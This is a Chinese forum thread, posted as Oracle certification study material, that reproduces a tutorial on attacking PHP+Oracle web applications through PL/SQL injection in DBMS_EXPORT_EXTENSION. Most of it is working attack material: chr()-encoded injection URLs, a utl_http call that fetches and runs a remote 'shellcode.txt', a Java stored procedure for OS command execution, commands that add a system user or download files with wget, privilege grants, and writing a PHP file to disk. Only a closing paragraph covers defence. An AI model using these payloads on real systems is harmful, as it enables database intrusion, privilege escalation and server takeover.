设为首页收藏本站
开启辅助访问 切换到窄版

a我考网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

我考网»我考网社区 计算机考试 Oracle认证 oracle认证应用技术学习资料汇总23
返回列表 发新帖
查看: 386|回复: 1

[考试辅导] oracle认证应用技术学习资料汇总23

[复制链接]
会计考友
发表于 2012-8-4 14:06:19 | 显示全部楼层 |阅读模式
 刚才说的另外一种思路是直接获得系统的shell,在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限,是非常诱人的。我们来看看如何操作吧!首先当然要用到我们上面说到的系统中比较少见的pl/sql注射,另外为了说明在php环境下对注射的处理,我们现在来假设我们的入侵环境是在php+Oracle上面,并且防火墙已经限制了对oracle端口的直接访问,如果是开放的话用网络上的直接添加系统帐户的方法也很容易成功!
' m" G" i& k  s2 U; J" X
6 R. K- {- _0 {6 E  首先是SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES这个函数的注射的一些简单解析
2 N8 l, @' T  t' a4 ~' r4 o  SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(’FOO’,’BAR’,’DBMS_OUTPUT".PUT(:P1); EXECUTE IMMEDIATE ’’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’’’CREATE USER TESTYOU IDENTIFIED BY TESTYOU ’’’’; END; ’’; END; --’,’SYS’,0,’1’,0)=’’
2 z8 q8 K9 [! F
. t0 g# S9 d8 Q9 G4 X  这是我看到的原形,分析下就知道是在第三个参数存在的注射,并且是因为"没有过滤造成的,把第三个参数提取出来就是
# @  o; x# _; A! c# \; T# J$ m  Q8 e; K7 k
  DBMS_OUTPUT".PUT(:P1); EXECUTE IMMEDIATE ’’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’’’CREATE USER TESTYOU IDENTIFIED BY TESTYOU ’’’’; END; ’’; END; --
7 H8 N% Z  b6 Z) x4 J/ v8 x2 Z& ?& s) B* O5 U
  可以看到DBMS_OUTPUT".PUT(:P1); 与END; --之间的所有部分都是原有漏洞注射语句的地方,里面是’’是因为我们要提交进’,但是外层将字符串括起来的正是’,所以需要对’进行转义,用的就是 ’’,后面可以看到用chr函数可以避免这一点。这里我们将要提取出来用在web Hacking上,这个函数提取出来的原形就是:  SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(’FOO’,’BAR’,’DBMS_OUTPUT".PUT(:P1); [多语句]END; --’,’SYS’,0,’1’,0)
7 \3 T( N+ W( L( |! O0 i5 x
" ~9 @  o! x  J2 F1 P! ~; ^  我们要执行多语句,并且不希望见到会被php处理的’的话就要对这个进行简单地再变形,多语句里如果出现’的话需要用’’转义。  SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)|| [多语句]||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) % t7 D2 c3 \; @9 T! ~
6 \8 m6 Q6 h6 z. [! L4 M
  没有出现’,并且可以执行多语句的的部分也很明确,用在web hacking上的模式就是  list.php?username=loveshell’ and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)|| [多语句]||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) ! M( y- d' ?; q7 V9 J; z8 I
  T1 I% O. _6 E( a1 a( Z4 e
  呵呵,前面第一个loveshell’不被影响是因为会被转成loveshell\’,而这个被oracle看作是loveshell\这个字符串后面跟一个’,完全合法。这个漏洞是跟系统有关的,我们起码需要测试一下漏洞存在与否吧?也很简单,如果整个参数被处理好的话,我们在多语句里填写非法的语句是应该正常解析才对,所以测试可不可以执行多语句就用
  {! x4 i0 ^: |. @5 [5 w
% S; O# M. ^) J3 b: E/ p9 X  list.php?username=loveshell’ and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)|| [一个非法的sql语句,如 chr(79)]||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0)=0—
2 ~/ n" c" z1 m/ j$ \/ S6 R8 g7 ?: H) a7 F
  如果出错了的话就说明漏洞是存在的(我测试的主机基本都有这个漏洞:P)但是到这大家也可以看到一个非常麻烦的事情,我们的多语句里的每个字符都转换成为chr的话整个参数将非常庞大,所以这里借用以下shellcode的概念,将我们的exploit放在另外一个地方,看我的语句吧!
2 ^7 r- p, m1 h" y# \# {/ Z7 t$ u5 F9 h/ L3 K/ F7 I$ u
  list.php?username=loveshell’ and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||utl_http.request(’http://www.loveshell.net/shellcode.txt’)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0)=0— 1 g6 a, U; y5 n3 w

  U$ k2 V# q1 F- Y0 K, U' k, P" E/ d  对,既然我们传的多语句只是字符串,为什么不把字符串放到远程的机器上然后用utl_http包取回来执行呢:),这里为了演示方便我并没有对 http://www.loveshell.net/shellcod.txt进行chr转换,实际php环境下还是需要转换的。
+ {7 a5 a/ C: x  ?/ N( Y9 h# J& A0 E
  好了,到这里我们能做到的是让Oracle将我远程机器上的一个文件作为PL/SQL运行了,很好,把前面的都放开,看如何利用现在的条件返回一个shell。查询相关的文档,知道比较通用一点返回shell的好方法是利用java外部存储过程,并且现在的除非是个人机器上,一般的都是支持 java的选项的,所以我们需要先来用java创建一个执行命令的存储过程。作为我们的shellcode需要变换一点东西,就是将必要的地方的’变成 ’’,为什么要这样前面讲过了。
5 r; B6 M  R" ?! T2 m0 [( e4 R4 P* D5 i- p% V: g1 Q2 p
  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS import java.lang.*; import java.io.*; public class JAVACMD{public static void execCommand (String command) throws IOException {Runtime.getRuntime().exec(command); }}; ’’; END; ’;
# Y  \' n; s3 D; d/ C& Q这样就创建了一个JAVACMD的java包,里面含有个函数execCommand,然后开始创建Oracle的存储过程, ; }/ @8 b& K; s

! d3 k) o! \% }; |  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2) AS LANGUAGE JAVA NAME ’’’’JAVACMD.execCommand (java.lang.String)’’’’; ’’; END; ’;
回复

使用道具 举报

会计考友
 楼主| 发表于 2012-8-4 14:06:20 | 显示全部楼层

oracle认证应用技术学习资料汇总23

  这样放到我们的http://www.loveshell.net/shellcod.txt里,然后依次请求上面的那个注射的语句(使用之前请先将其中的utl_http.request(’http://www.loveshell.net/shellcod.txt’)替换为 utl_http.request(chr()....chr())的形式),就会在服务器创建存储了个javacmdproc过程了,参数是字符串,会被当作命令执行。我们执行试试 * F' ~7 L" @9 l& x/ A( M: [) H

% h1 j* P* m: E( Z1 C' Q  将shellcode.txt内容换成 / T% v, p4 @5 s) O
  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’begin javacmdproc(’’’’cmd.exe /c net user loveshell loveshell /add’’’’); end; ’’; END; ’;
% Y9 `- Z+ |+ z3 |  或者在linux下就是 2 ?3 m; K0 W" a$ u
  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’begin javacmdproc(’’’’wget http://www.loveshell.net -O /tmp/loveshell’’’’); end; ’’; END; ’; * S% f# H! t! ^
  呵呵,有可能成功,但是也有可能出现类似于下面的情况
9 h: T: a/ N# z  ERROR at line 1:  ORA-29532: Java call terminated by uncaught Java exception:
2 u+ d# j# B- v1 l  java.security.AccessControlException: the Permission (java.io.FilePermission ( U  U7 @1 q- D' _' ^1 {
   execute) has not been granted to LOVESHELL. The PL/SQL to grant   H! p) J9 N! {/ X  E' D
  this is dbms_java.grant_permission( ’LOVESHELL’, ’SYS:java.io.FilePermission’,
8 D1 W* J: K) C7 A& h; `& P/ t  ’’, ’execute’ )
  i7 }, l3 w2 Y  ORA-06512: at "LOVESHELL.JAVACMDPROC", line 0 * a8 b" G# ?. t* V0 L
  ORA-06512: at line 1
+ d1 J3 i  [5 [1 E  没关系,java在oracle也是需要权限的,我们需要把相关的权限给它才可以哦!在Oracle里这样操作的
: E* l. O! P0 N6 b: \! \2 J! B  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’grant javasyspriv to loveshell; ’’; END; ’; ! x$ [9 c; P* d. u0 h3 K$ ?
  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’begin exec dbms_java.grant_permission(’’’’LOVESHELL’’’’,’’’’SYS:java.io.FilePermission’’’’,’’’’’’’’,’’’’execute’’’’); end; ’’; END; ’;
  T, B+ R$ S$ J% f* R
9 _1 s& k) j! w: S' t4 t8 ]  各个服务器可能设置不一样,根据他提示要求的权限赋予给它就可以了。 , }- t, P3 c" i$ J3 v7 Y: d
  根据自己的情况将这个语句类似的语句放到shellcode.txt里执行,然后就可以顺利地执行命令了。java本身是很强大的,直接返回 shell也是可能的。当然,当数据库在本机的时候,利用系统中存在的utl_file包写一个文件也是可以的。这里提供简单的,可以作为 shellcode.txt里运行的代码 . \! `3 h, [; O1 S

8 y/ N6 v+ k( U, |9 O& |  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’create or replace procedure utlwritefile(p_directory in varchar2, p_filename in varchar2, p_line in varchar2) as fd utl_file.file_type; begin fd := utl_file.fopen(p_directory, p_filename, ’’’’a’’’’); utl_file.put_line(fd, p_line); if (utl_file.is_open(fd) = true) then utl_file.fclose(fd); end if; end; ’’; END; ’; % a, \  O( V1 l/ T7 @$ o9 T8 ]

1 t8 |: b* k- @$ s  这是创建能写文件的utlwritefile存储过程,注意这里的目录是oracle里的虚拟目录,不是物理目录,我们需要自己创建一个虚拟目录并且给予相关的权限
' n" r, H" O- ^; s
& [6 g' L8 b0 `3 C$ E3 V2 @4 g  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’create or replace directory utl_dir_new as ’’’’f:/inc/’’’’’’; END; ’;
/ R% O1 E, h1 r( D! |! ]" d# X2 A8 X( B
  这里假设需要写东西到f:/inc里,建立了个utl_dir_new的oracle目录,然后给权限
% _% d9 p) [% w2 W1 E  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’grant write on directory utl_dir_new to public; ’’; END; ’;
( g1 A2 U2 n6 z! `  EXECUTE IMMEDIATE ’DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ’’begin utlwritefile(’’’’UTL_DIR_NEW’’’’,’’’’1.php’’’’,’’’’test’’’’); end; ’’; END; ’; * l  b6 M! ~' `: T7 l* x$ m
  注意UTL_DIR_NEW的大小写,这里写了个test到UTL_DIR_NEW里面的1.php里。
# o8 n( o) h' o: o7 l3 ]* S; `1 o3 s4 `) w' @5 U/ `
  五 环境限制 9 r& ?# _: S4 E# A
  上面演示的是用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES这个函数的漏洞,漏洞跟版本有很大关系,所以上面的信息探测也比较重要。实际上,在早点的8i版本里也有类似的漏洞,ctxsys.driload.validate_stmt(’grant dba to scott’)这样的形式可以直接以高权限身份执行各种Oracle语句,也可以相应地用在web环境注射里。只要存在可用来执行多语句的漏洞,web注射就有非常大的利用价值。
' s1 c) U: j4 G# b: a5 l% m, d) X2 e. X5 _2 p) Q4 e9 q" h( p
  六 关于防护 * @) ]; R: Y/ u
  首先就是尽量有好的编程习惯,避免使用字符串连接的方式来执行Sql语句,如果一定要采用字符串连接方式来执行Sql,那也对进入的参数必须做好过滤,是数字类型的话就强制为数字,是字符串类型的就要做好过滤,从数据库等其他途径过来的数据也必须做好验证,在web app上杜绝Sql注射漏洞。另外在Oralce方面就是要做好对1521端口的防火墙过滤,避免被人直接登陆,对一些不需要的包和存储过程可以考虑删除,对一些Sql注射漏洞也要及时做好补丁,避免数据库的沦陷。
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Woexam.Com ( 湘ICP备18023104号 )

GMT+8, 2024-9-28 06:10 , Processed in 0.366266 second(s), 24 queries .

Powered by Discuz! X3.4 Licensed

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表